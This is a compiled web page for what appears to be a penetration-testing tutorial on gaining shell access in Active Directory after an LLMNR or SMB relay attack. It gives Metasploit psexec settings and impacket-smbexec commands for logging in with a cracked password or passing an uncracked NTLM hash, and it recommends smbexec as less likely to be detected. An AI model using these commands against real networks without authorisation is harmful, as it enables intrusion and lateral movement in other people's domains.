"use strict"; const {Fragment: _Fragment, jsx: _jsx, jsxs: _jsxs} = arguments[0]; const {useMDXComponents: _provideComponents} = arguments[0]; function _createMdxContent(props) { const _components = { a: "a", code: "code", div: "div", h1: "h1", p: "p", pre: "pre", span: "span", ..._provideComponents(), ...props.components }, {HT, Youtube} = _components; if (!HT) _missingMdxReference("HT", true); if (!Youtube) _missingMdxReference("Youtube", true); return _jsxs(_Fragment, { children: [_jsx(Youtube, { id: "NNtJpycGBOE" }), "\n", _jsxs(_components.h1, { id: "gaining-shell-access-in-active-directory", children: [_jsx(_components.a, { "aria-hidden": true, tabIndex: "-1", className: "hash-link", href: "#gaining-shell-access-in-active-directory", children: _jsx(_components.span, { className: "icon icon-link" }) }), "Gaining Shell Access in Active Directory"] }), "\n", _jsxs(_components.p, { children: ["After conducting an LLMNR or SMB relay attack, one of the steps an attacker can take is to use the collected credentials, specifically the domain NTLMv2 hashes or the local NTLMv2 hashes belonging to local users, to gain shell access in an Active Directory environment. This access can provide valuable information about the systems. There are various scripts available in Python that can facilitate shell access, such as ", _jsx(HT, { color: `yellow`, children: "impacket-psexec" }), ",", _jsx(HT, { color: `yellow`, children: " impacket-smbexec" }), ", and", _jsx(HT, { color: `yellow`, children: " impacket-wmiexec" }), ". Some of these tools are also integrated into Metasploit. By providing the appropriate arguments, attackers can easily gain shell access using these tools."] }), "\n", _jsx(_components.p, { children: "However, there is a possibility that Metasploit may be detected during real-world use, which could hinder its effectiveness. Therefore, we will also demonstrate how to use one of the most powerful alternatives to Metasploit, impacket-smbexec, to gain shell access. The Metasploit module and the impacket-smbexec tool will be explained in parallel, allowing you to choose the option that best suits your needs." }), "\n", _jsx(_components.p, { children: "Let's begin our shell-gaining attack!" }), "\n", _jsxs(_components.h1, { id: "gaining-shell-access-using-the-psexec-module-in-metasploit", children: [_jsx(_components.a, { "aria-hidden": true, tabIndex: "-1", className: "hash-link", href: "#gaining-shell-access-using-the-psexec-module-in-metasploit", children: _jsx(_components.span, { className: "icon icon-link" }) }), "Gaining Shell Access Using the PsExec Module in Metasploit"] }), "\n", _jsx(_components.p, { children: "After successfully performing an LLMNR attack, the attacker acquires the domain name, username, and the NTLMv2 hash of the targeted user, which can be cracked using Hashcat. In this scenario, we have already executed our LLMNR attack and collected the necessary credentials, including the domain name, username, NTLMv2 hash, and the plaintext password after cracking the NTLMv2 hash." }), "\n", _jsx(_components.p, { children: "Now, we want to gain shell access to the system of that user by entering their domain username and password. To achieve this, we will use the PsExec module in Metasploit." }), "\n", _jsxs(_components.p, { children: ["First, open your terminal and type", _jsxs(HT, { color: `yellow`, children: [" ", _jsx(_components.code, { children: "msfconsole" })] }), " to launch Metasploit.\nOnce it is open, use the command ", _jsx(HT, { color: `yellow`, children: _jsx(_components.code, { children: "search psexec" }) }), " to locate the PsExec module.\nAfter identifying the module, you can view the required options by typing ", _jsx(HT, { color: `yellow`, children: _jsx(_components.code, { children: "options" }) }), "."] }), "\n", _jsx(_components.p, { children: "Next, set the necessary parameters using the following commands:" }), "\n", _jsx(_components.div, { className: "rehype-code-title", children: "psexec" }), _jsx(_components.pre, { className: "language-bash", children: _jsxs(_components.code, { className: "language-bash code-highlight", children: [_jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token builtin class-name", children: "set" }), " smbdomain ", _jsx(_components.span, { className: "token operator", children: "<" }), "name of domain:eg. NET.local", _jsx(_components.span, { className: "token operator", children: ">" }), "\n"] }), _jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token builtin class-name", children: "set" }), " smbuser ", _jsx(_components.span, { className: "token operator", children: "<" }), "username:eg. tom", _jsx(_components.span, { className: "token operator", children: ">" }), "\n"] }), _jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token builtin class-name", children: "set" }), " smbpass ", _jsx(_components.span, { className: "token operator", children: "<" }), "plaintext password:eg. Password12345Q", _jsx(_components.span, { className: "token operator", children: ">" }), "\n"] }), _jsx(_components.span, { className: "code-line", children: "\n" })] }) }), "\n", _jsxs(_components.p, { children: ["Once all required fields are filled, simply type ", _jsx(HT, { color: `yellow`, children: _jsx(_components.code, { children: "run" }) }), " to initiate the attack and gain shell access to the user's system."] }), "\n", _jsxs(_components.h1, { id: "gaining-shell-access-with-impacket-smbexec", children: [_jsx(_components.a, { "aria-hidden": true, tabIndex: "-1", className: "hash-link", href: "#gaining-shell-access-with-impacket-smbexec", children: _jsx(_components.span, { className: "icon icon-link" }) }), "Gaining Shell Access with Impacket-SMBExec"] }), "\n", _jsx(_components.p, { children: "We can achieve the same outcome as in the previous section using impacket-smbexec, and this time the probability of the attack being detected or prevented is significantly lower. To gain shell access, we will use the following command:" }), "\n", _jsx(_components.div, { className: "rehype-code-title", children: "smbexec" }), _jsx(_components.pre, { className: "language-bash", children: _jsxs(_components.code, { className: "language-bash code-highlight", children: [_jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token function", children: "sudo" }), " impacket-smbexec ", _jsx(_components.span, { className: "token operator", children: "<" }), "Domain_Name", _jsx(_components.span, { className: "token operator", children: ">" }), "/", _jsx(_components.span, { className: "token operator", children: "<" }), "username", _jsx(_components.span, { className: "token operator", children: ">" }), ":", _jsx(_components.span, { className: "token operator", children: "<" }), "plain_password", _jsx(_components.span, { className: "token operator", children: ">" }), "@", _jsx(_components.span, { className: "token operator", children: "<" }), "IP_of_target_system", _jsx(_components.span, { className: "token operator", children: ">" }), "\n"] }), _jsx(_components.span, { className: "code-line", children: "\n" })] }) }), "\n", _jsx(_components.p, { children: "For example, the command would look like this:" }), "\n", _jsx(_components.div, { className: "rehype-code-title", children: "smbexec_example" }), _jsx(_components.pre, { className: "language-bash", children: _jsx(_components.code, { className: "language-bash code-highlight", children: _jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token function", children: "sudo" }), " impacket-smbexec Cando/Tom:", _jsx(_components.span, { className: "token string", children: "'Password1'" }), "@192.168.1.118\n"] }) }) }), "\n", _jsxs(_components.h1, { id: "gaining-shell-access-using-uncracked-ntlmv2-hashes", children: [_jsx(_components.a, { "aria-hidden": true, tabIndex: "-1", className: "hash-link", href: "#gaining-shell-access-using-uncracked-ntlmv2-hashes", children: _jsx(_components.span, { className: "icon icon-link" }) }), "Gaining Shell Access Using Uncracked NTLMv2 Hashes"] }), "\n", _jsx(_components.p, { children: "In the previous section, we demonstrated how to gain access using a cracked NTLMv2 hash. However, in this scenario, we will show that even with a NTLMv2 hash , which has not yet been cracked, we can still gain shell access." }), "\n", _jsxs(_components.p, { children: ["In this case, we have the credentials of a local user along with their local NTLMv2 hash. We will use the PsExec module in Metasploit again, but this time we will unset the ", _jsx(HT, { color: `yellow`, children: _jsx(_components.code, { children: "smbdomain" }) }), " parameter. This is necessary because the NTLMv2 hash belongs to a local user rather than a domain user, meaning there is no need to authenticate with the Domain Controller (DC)."] }), "\n", _jsxs(_components.p, { children: ["Next, we will change the IP address to that of the target system and set the ", _jsx(_components.code, { children: "smbpass" }), " to the ", _jsx(HT, { color: `yellow`, children: "LM:NTLM " }), "password hash. This can be done using the following commands:"] }), "\n", _jsx(_components.div, { className: "rehype-code-title", children: "not_cracked_NTLMv2" }), _jsx(_components.pre, { className: "language-bash", children: _jsxs(_components.code, { className: "language-bash code-highlight", children: [_jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token builtin class-name", children: "unset" }), " smbdomain\n"] }), _jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token builtin class-name", children: "set" }), " smbuser ", _jsx(_components.span, { className: "token operator", children: "<" }), "username", _jsx(_components.span, { className: "token operator", children: ">" }), "` ", _jsx(_components.span, { className: "token punctuation", children: "(" }), "local user", _jsx(_components.span, { className: "token punctuation", children: ")" }), "\n"] }), _jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token builtin class-name", children: "set" }), " smbpass ", _jsx(_components.span, { className: "token operator", children: "<" }), "lm:ntlm password hash", _jsx(_components.span, { className: "token operator", children: ">" }), "\n"] }), _jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token builtin class-name", children: "set" }), " RHOST ", _jsx(_components.span, { className: "token operator", children: "<" }), "IP_of_target_system", _jsx(_components.span, { className: "token operator", children: ">" }), "\n"] })] }) }), "\n", _jsx(_components.p, { children: "By following these steps, you can successfully establish a shell connection to the target system using the NTLMv2 hash without needing domain authentication." }), "\n", _jsxs(_components.h1, { id: "gaining-shell-access-with-uncracked-ntlmv2-using-smbexec", children: [_jsx(_components.a, { "aria-hidden": true, tabIndex: "-1", className: "hash-link", href: "#gaining-shell-access-with-uncracked-ntlmv2-using-smbexec", children: _jsx(_components.span, { className: "icon icon-link" }) }), "Gaining Shell Access with Uncracked NTLMv2 Using SMBExec"] }), "\n", _jsx(_components.p, { children: "With smbexec, we can achieve the same goal as mentioned above, even when we have an uncracked NTLMv2 hash. To gain shell access, use the following command:" }), "\n", _jsx(_components.div, { className: "rehype-code-title", children: "not_cracked_NTLMv2_smbexec" }), _jsx(_components.pre, { className: "language-bash", children: _jsx(_components.code, { className: "language-bash code-highlight", children: _jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token function", children: "sudo" }), " impacket-smbexec ", _jsx(_components.span, { className: "token operator", children: "<" }), "username", _jsx(_components.span, { className: "token operator", children: ">" }), "@", _jsx(_components.span, { className: "token operator", children: "<" }), "IP_of_target", _jsx(_components.span, { className: "token operator", children: ">" }), " ", _jsx(_components.span, { className: "token parameter variable", children: "-hashes" }), " lm:ntlm\n"] }) }) }), "\n", _jsx(_components.p, { children: "For example, if the local username is Tom, the target IP address is 192.168.1.118, and the NTLM hashes are lm_hash and ntlm_hash, the command would look like this:" }), "\n", _jsx(_components.div, { className: "rehype-code-title", children: "not_cracked_NTLMv2_smbexec" }), _jsx(_components.pre, { className: "language-bash", children: _jsx(_components.code, { className: "language-bash code-highlight", children: _jsxs(_components.span, { className: "code-line", children: [_jsx(_components.span, { className: "token function", children: "sudo" }), " impacket-smbexec Tom@192.168.1.118 ", _jsx(_components.span, { className: "token parameter variable", children: "-hashes" }), " lm:ntlm_hash\n"] }) }) }), "\n", _jsx(_components.p, { children: "This command allows you to authenticate using the NTLMv2 hash without needing to crack it first. By providing the username and the target IP address, along with the appropriate LM and NTLM hashes, you can successfully establish a shell connection to the target system." })] }); } function MDXContent(props = {}) { const {wrapper: MDXLayout} = { ..._provideComponents(), ...props.components }; return MDXLayout ? _jsx(MDXLayout, { ...props, children: _jsx(_createMdxContent, { ...props }) }) : _createMdxContent(props); } return { default: MDXContent }; function _missingMdxReference(id, component) { throw new Error("Expected " + (component ? "component" : "object") + " `" + id + "` to be defined: you likely forgot to import, pass, or provide it."); }